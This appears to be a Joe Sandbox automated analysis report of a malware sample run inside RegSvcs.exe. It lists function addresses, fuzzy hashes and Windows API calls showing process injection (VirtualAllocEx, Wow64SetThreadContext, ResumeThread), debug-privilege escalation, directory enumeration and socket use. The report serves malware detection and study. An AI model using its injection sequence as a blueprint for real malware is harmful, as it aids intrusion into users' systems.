Opcode ID: 16933d4964f4f94f9cdcecf87da6523b193eed127f016f2b30306a223a57cb94
Instruction ID: 2b02258ff1ddbe174ec24f071de702987194a98ff992e968a498f082b347b65f
Opcode Fuzzy Hash: 16933d4964f4f94f9cdcecf87da6523b193eed127f016f2b30306a223a57cb94
Instruction Fuzzy Hash: 162136B29003599FCB10DFA9C880AEEBBF5FF48310F10842EE559A7250C7389545CBA5

Function 0738A628 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0738A6A6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 468df9b880bb12519ec151c5a968849e76c18b85d165ccf1652d5ecbf1051042
Instruction ID: 7a1f091eb7000a1797b9f499764e97d2662d9ef69c89b6ecaa1d44b21e03acf9
Opcode Fuzzy Hash: 468df9b880bb12519ec151c5a968849e76c18b85d165ccf1652d5ecbf1051042
Instruction Fuzzy Hash: 8E2138B19003098FDB10DFAAC4857EEBBF4EF88324F10C42AD459A7240D778A944CFA5

Function 0738ACE8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0738AD68

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 48f28834a4520c176589c3e4786afcef9bf24ebb91454a7ebce423b6d5912ef0
Instruction ID: 197f8ac26e5ba4856abdfd7784bc835d0db319c3cd3ed7d3d85f755719efa075
Opcode Fuzzy Hash: 48f28834a4520c176589c3e4786afcef9bf24ebb91454a7ebce423b6d5912ef0
Instruction Fuzzy Hash: A32137B19003599FDB10DFAAC880BEEFBF5FF48320F10842AE558A7250D7389944CBA5

Function 0738A570 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0738A5DA

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 340de986222d7f062e8ea5b8c4beaa6f74477805a99227aa194e5fcca863c58d
Instruction ID: 66d2aa867137a1a5d121affd4cda86c62477b8e236af580588b17ba36fe0286b
Opcode Fuzzy Hash: 340de986222d7f062e8ea5b8c4beaa6f74477805a99227aa194e5fcca863c58d
Instruction Fuzzy Hash: D61147B5D00249CFDB20DFA9C4457EEFBF4EB88314F24842AD459A7210D739A944CF95

Function 0738AB31 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0738ABA6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4895e20e0c4245d2ee3696eabd262e0b094baf1f02288034cecdb498b76bb648
Instruction ID: bd1a16e7c073827e4a72e440e8c455041df32bbfbb9b6d390e0954555968cdfa
Opcode Fuzzy Hash: 4895e20e0c4245d2ee3696eabd262e0b094baf1f02288034cecdb498b76bb648
Instruction Fuzzy Hash: 031159B59002499FDB10DFA9C845BEEBFF5EF88320F20841AD559A7250C7359944CF91

Function 0738AB38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0738ABA6

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 82585647a9c5500dc7a97c8bc861461a05ab143435f5c75140dabe19f9f1daa7
Instruction ID: 14326712105ebbb5a86906eed57fd4f8c894904c668572596b52974dff324da6
Opcode Fuzzy Hash: 82585647a9c5500dc7a97c8bc861461a05ab143435f5c75140dabe19f9f1daa7
Instruction Fuzzy Hash: B91167B19002499FCB10DFAAC844BDEBFF5EF88320F20881AE559A7250C735A944CFA5

Function 0738A578 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0738A5DA

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b1d23e64ca808fc0535582e928a762a78af56a357bcac32982ed4c6387d1359b
Instruction ID: bf40c96434d4ad93f8e940d6461b31588a49c1ddd2cf79dd19c7106e554a7197
Opcode Fuzzy Hash: b1d23e64ca808fc0535582e928a762a78af56a357bcac32982ed4c6387d1359b
Instruction Fuzzy Hash: EA116AB19003498FDB20DFAAC4447DEFBF4EB88324F20842AC459A7240CB38A584CF95

Function 0738AED4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0738F6E5

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b38ea5479831b25867920a0fe63533ed700c37f1e0de846d98bae2822b945378
Instruction ID: efc59c075d74df03f13e27576e1b99acdda2d3b39db0b626314de5f73b5f263c
Opcode Fuzzy Hash: b38ea5479831b25867920a0fe63533ed700c37f1e0de846d98bae2822b945378
Instruction Fuzzy Hash: D01103B590034ADFDB50DF9AC449BDEBBF8EB48324F208419E559A7310C375A944CFA5

Function 0079E698 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0079E6FE

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ae5ec37c530bfadd4bdb127f9985836d7127b6b4376120b482be6e6259edffb
Instruction ID: e0328f2d45cc958bfb85a4448aec4bbe5f31f2cf0e00067aeed6880b85068959
Opcode Fuzzy Hash: 2ae5ec37c530bfadd4bdb127f9985836d7127b6b4376120b482be6e6259edffb
Instruction Fuzzy Hash: 9811E0B5D00349CFCB10DF9AD444ADEFBF4AB88324F10842AD459A7210D379A545CFA6

Function 0073D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4801fe0acfa794c6c51432b85d7e5e34ef2bdb54f241e15106ebb4c13d3358
Instruction ID: 9db323fd58cf075f826e0de350bd75256a9a0a8c641df1ae597e9c1932df4f03
Opcode Fuzzy Hash: 2a4801fe0acfa794c6c51432b85d7e5e34ef2bdb54f241e15106ebb4c13d3358
Instruction Fuzzy Hash: 1921F4B1504244DFEB15DF14E9C0B16BF65FB94314F20C169DD094B257C33AEC56C6A2

Function 0074D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753233629.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47895b2a8dabbe56de21c11320dada109cdcea9b64dab9ffcec174b83129423
Instruction ID: e12bb59098feee0ef580e86d68e2e842e5fc6f4f074ff091d886f1aa253b679c
Opcode Fuzzy Hash: d47895b2a8dabbe56de21c11320dada109cdcea9b64dab9ffcec174b83129423
Instruction Fuzzy Hash: D721F271604204DFCB24DF14D9C4B26BBA5EB88314F20C56DD88A4B2A6C37ADC47CA61

Function 0073D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 050667b5e60e1d3bb874a32d8c8e2aef450ce61532c38ab952fc9ecfbacb2604
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: EC11CD72404280CFDB12CF10E5C4B16BF62FB94324F24C2A9DC090A256C33AE85ACBA1

Function 0074D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753233629.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: e0e0c48d57203e7c4b83f945a3f6e695e3e606c110f6abd42c3073c828a0a358
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 5D119D75504284DFDB25CF14D5C4B16FFA2FB88314F24C6AED8494B666C33AD84ACBA2

Function 0073D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b432d43552eb7d19491eb29f6fa9055e04eae35c99b9e57a27a68bd9f16652a7
Instruction ID: 48c2c7cee60f6cbb97beb943c01d30389ad340818b13082dd274bf5c1b39e042
Opcode Fuzzy Hash: b432d43552eb7d19491eb29f6fa9055e04eae35c99b9e57a27a68bd9f16652a7
Instruction Fuzzy Hash: 4B01A2715083449AF7308A29DD847A7BFA8EF45325F28C52AED094A297D37D9C44C6B2

Function 0073D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753192736.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 120bda339beffb4309c827e7f3705bbdd1635b29ef2e3ebb5a94a064207b1e88
Instruction ID: 97b87f678c663e4556b810c4ebd63e1c2b38b5ce8136c651ed5fa9a1b5dd4716
Opcode Fuzzy Hash: 120bda339beffb4309c827e7f3705bbdd1635b29ef2e3ebb5a94a064207b1e88
Instruction Fuzzy Hash: 65F0C2710043449AE7208A1ADC84B66FFA8EB90334F18C55AED080E283C3799C44CAB1

Non-executed Functions

Function 00792C98 Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

O (, xrefs: 00792CFE
)dKD, xrefs: 00792CF7

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID: )dKD$O (
API String ID: 0-299907402
Opcode ID: f19ecf9341c827a88c47697e8082acc929e86c2dbcbac60d82cdb86fcf69e695
Instruction ID: 3909662463d5c633869cdd65eb62c21d4c892fee95d26ecdf0ebe4ec5a7b2ded
Opcode Fuzzy Hash: f19ecf9341c827a88c47697e8082acc929e86c2dbcbac60d82cdb86fcf69e695
Instruction Fuzzy Hash: F3410731B10205DFCB54DB29D88155BB7F1FB85300B10CC2AD15ADB761D238E842CF62

Function 07389658 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc4a67711656582da6a46ade0dd44d6cdc0bd0a7b9b11b019e1e05741362ac5
Instruction ID: 861426c464d4c3ba4ee18bcbbb640e8c4aca2b9a692dbd05e2a149a47ce27d8d
Opcode Fuzzy Hash: ffc4a67711656582da6a46ade0dd44d6cdc0bd0a7b9b11b019e1e05741362ac5
Instruction Fuzzy Hash: 97D14BF0E002168FDB54DF59C584ABDBBF6AF89304F258169E418AB252D735ED42CFA0

Function 0738A700 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05fafea83d3119865b4fd8079c42ac120b6dd7ef3acc6cd9c80b395dba54d1d
Instruction ID: aef909a0564431c48cd3648b4d5f5db28039caaa0960c6f9a92f0186b79bc13f
Opcode Fuzzy Hash: c05fafea83d3119865b4fd8079c42ac120b6dd7ef3acc6cd9c80b395dba54d1d
Instruction Fuzzy Hash: FDE1FCB4E102198FDB54DFA9C5809AEFBB2BF49304F24C16AE419AB355D734AD42CF60

Function 073884C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a53755adbe6369144bd1c822059eed8d1c2e0c617004a26cf9344c2545d61d6
Instruction ID: c3cda99eeab91836fc92301ee832a50fe2f86b32162cbcddbb3410ed41940592
Opcode Fuzzy Hash: 5a53755adbe6369144bd1c822059eed8d1c2e0c617004a26cf9344c2545d61d6
Instruction Fuzzy Hash: DFE1FBB4E102198FDB54DFA9C5809AEFBB2FF49304F648169E419AB356D730AD42CF60

Function 07388088 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76441728f656abc95a2c8a8a307cd4fa5ff7fc60bd7f77c6b8b01a3a2b73872c
Instruction ID: 2ed9f0eb3222c47937ad023e830fd0d5094896958022a46ca7d63c0d65a57ab2
Opcode Fuzzy Hash: 76441728f656abc95a2c8a8a307cd4fa5ff7fc60bd7f77c6b8b01a3a2b73872c
Instruction Fuzzy Hash: A0E10CB4E102198FDB14DFA9C5809AEFBB2BF89304F648159E419AB356D731AD42CF60

Function 07389D00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab29859ebad6f6595a246f133f576feba85831af0fe2a1f7e5b74b0250d3d99b
Instruction ID: 64d858d1365084d9541e6bb52f78f3de049eec3377543e7a9240b94605c490f1
Opcode Fuzzy Hash: ab29859ebad6f6595a246f133f576feba85831af0fe2a1f7e5b74b0250d3d99b
Instruction Fuzzy Hash: 14E10DB4E012198FDB14DFA9C580AAEFBB2BF49304F24D15AE419AB355D730AD42CF61

Function 073898C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f22b2c94ad96a4c0d330ffae4903375842618328025886e24dc964381747f6e
Instruction ID: 4e115512b46c1c93db1fa5135b58c2f674cda0833e22115ad3b199a2efe0430b
Opcode Fuzzy Hash: 8f22b2c94ad96a4c0d330ffae4903375842618328025886e24dc964381747f6e
Instruction Fuzzy Hash: E7E11CB4E002198FDB14DFA9C580AAEFBF2BF89304F248159E419AB355D735AD42CF60

Function 07389CEF Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd20a4a108891dc2765ed05b3c6fa9d80c5b3e62c8574040848aa181541255e
Instruction ID: 7ba64766f8b1d0f5bbb5791f5e4365758178e5dbba79ce3d002da97a88f4cd93
Opcode Fuzzy Hash: cdd20a4a108891dc2765ed05b3c6fa9d80c5b3e62c8574040848aa181541255e
Instruction Fuzzy Hash: D5510EB4E052198FDB14DFA9C5805AEFBF2BF89304F14C16AE418A7256D7346D42CFA1

Function 007937A8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a57a24ec3d25d11e06c1d4c12d47d9670d3c9b2ae9c4e6ec7b909bd919f5a5a
Instruction ID: e00971b3905447caf80ff04b7a759144627d59950da13f6d7859ab972e8d6b4a
Opcode Fuzzy Hash: 9a57a24ec3d25d11e06c1d4c12d47d9670d3c9b2ae9c4e6ec7b909bd919f5a5a
Instruction Fuzzy Hash: 9E31A4B5F142198FCF00CF99D88589EFBF6FB88710F648526E509EB351D238DA418B91

Analysis Process: RegSvcs.exePID: 7996, Parent PID: 7480COMMON

Execution Graph

Execution Coverage:	31.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	94

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
